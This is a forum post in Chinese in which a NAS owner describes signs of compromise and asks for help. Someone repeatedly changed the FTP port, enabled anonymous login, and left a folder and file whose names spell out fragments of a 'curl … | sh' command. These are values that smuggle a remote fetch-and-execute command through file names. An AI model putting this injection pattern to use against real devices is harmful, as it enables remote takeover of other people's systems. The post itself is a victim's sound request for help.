最近在使用發現NAS有一些怪異現象,
1.我自己設定FTP Port 6XX且不允許匿名登入,
有一天再去查看系統紀錄時看到一堆IP連進我FTP都是匿名,
後來去查看FTP的設定,FTP Port 變為 49832且變成允許匿名登入,
我並查看了一下我帳號是否有被別人登入過發現沒有,
但是我還是做了改密碼的動作,
並把FTP在設定為FTP Port 6XX且不允許匿名登入。
2.這一兩天我很勤勞的上去看發現又被改掉,但是系統紀錄沒有被別人登入過,只有我的紀錄
這次我把FTP關掉,並在Pubilc資料夾內發現了一個很奇怪的資料夾,
最底成名稱為(bin; curl -vk -m 600 --connect-timeout 15 https:),
這資料夾裡面只有一個檔案名稱為(nUqjHq3K.sh | sh >.mp3) ,我發現.sh前面的名稱每次都不一樣
後來我把這個資料夾刪除後過幾天又出現ftp又被改了。
我附上他的跑的.sh麻煩專業的大大能告訴我發生甚麼事情,
附加壓縮檔: nUqjHq3K.sh
這困擾我一陣子,
謝謝。

X